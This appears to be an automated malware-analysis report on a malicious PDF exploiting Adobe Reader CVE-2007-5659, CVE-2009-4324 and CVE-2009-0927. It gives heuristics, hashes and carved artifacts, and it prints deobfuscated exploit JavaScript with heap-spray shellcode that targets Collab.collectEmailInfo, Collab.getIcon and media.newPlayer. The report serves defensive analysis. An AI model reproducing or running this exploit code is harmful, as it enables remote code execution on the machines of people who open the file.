MALICIOUS (Risk Score 476)

Malware Insights

MITRE ATT&CK:
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
This PDF file contains obfuscated JavaScript that exploits multiple known vulnerabilities in Adobe Reader (CVE-2007-5659, CVE-2009-4324, CVE-2009-0927). The script is designed to execute arbitrary code, as indicated by the 'Js.Exploit.Shellcode-18' ClamAV signature and the ML classifier flagging it as highly malicious. The primary function of the script appears to be downloading and executing a second-stage payload, though the exact URL is obfuscated.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (9)
- media.newPlayer — CVE-2009-4324 (critical, CVE exact, rule CVE_2009_4324): PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (Identified after JavaScript deobfuscation.)
- Collab.getIcon — CVE-2009-0927 (critical, CVE exact, rule CVE_2009_0927): PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (Identified after JavaScript deobfuscation.)
- Collab.collectEmailInfo — CVE-2007-5659 (critical, CVE exact, rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
- Pidief-style multi-CVE JavaScript dispatcher (critical, CVE likely, rule PDF_PIDIEF_MULTI_CVE_DISPATCH): A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- Multi-CVE Adobe Reader JavaScript exploit kit (critical, rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT): One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action (low, 2 related findings, rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical, rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Embedded JS stream (low, rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info, rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (3)
Files carved from inside the sample during analysis.

| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| javascript_obj0039_000.js | bd82ff54b6772016bffee3bce1d2f3094985540530f3bd63328afec82b13e48c | pdf-javascript-stream | PDF /JS object 39 at offset 0x16F | 28112 bytes |
| legacy_pdfkit_stage_000.js | 5b9713b24ca2f3ad63839b771c3e3c53bdc066d7fc4958eaf906da5deae096f6 | deobfuscated-js | numeric array XOR decoded JavaScript at offset 0x16F | 5344 bytes |
| legacy_pdfkit_stage_001.js | 1498a25280444fc9e04889a0622422b714ff4dc559d344fcc836b48a36a0ed2e | deobfuscated-js | numPages XOR decoded JavaScript at offset 0x16F | 5344 bytes |

Artifact 1: javascript_obj0039_000.js (pdf-javascript-stream, PDF /JS object 39 at offset 0x16F, 28112 bytes)
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token)
Preview script (first 1,000 lines of the extracted script):
Artifact 2: legacy_pdfkit_stage_000.js (deobfuscated-js, numeric array XOR decoded JavaScript at offset 0x16F, 5344 bytes)
Detection
- ClamAV: Js.Exploit.Shellcode-18
- Obfuscation or payload: likely (carved artifact contains 9 eval/decoder/string-building tokens)
Preview script (first 1,000 lines of the extracted script):
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function newplayer(){
var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%uC7CE%uDFD6%uCE90%uCA89%uCFD3%uC0C2%uD5C4%uDEC8%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC8F9%uD1C3%uCAF6%uDFC7%uD4C3%uC080%u9BCE%u00A6");
var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");
while(block.length <= 32768) block+=block;
block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}
util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());
util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(GDagaCuyNfRSFzaSZLO, new Date());}
function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%uC7CE%uDFD6%uCE90%uCA89%uCFD3%uC0C2%uD5C4%uDEC8%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC3F9%uC7CB%uCACF%uC080%u9BCE%u00A6");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3
... (truncated)
Artifact 3: legacy_pdfkit_stage_001.js (deobfuscated-js, numPages XOR decoded JavaScript at offset 0x16F, 5344 bytes)
Preview script (first 1,000 lines of the extracted script): the preview text was garbled during extraction (case-folded and stripped of punctuation and hex digits); the recoverable tokens (fix_it, newplayer, collab_email, collab_geticon, util.printd, media.newPlayer, Collab.collectEmailInfo, Collab.getIcon) match the legacy_pdfkit_stage_000.js stage above, which has the same 5344-byte size.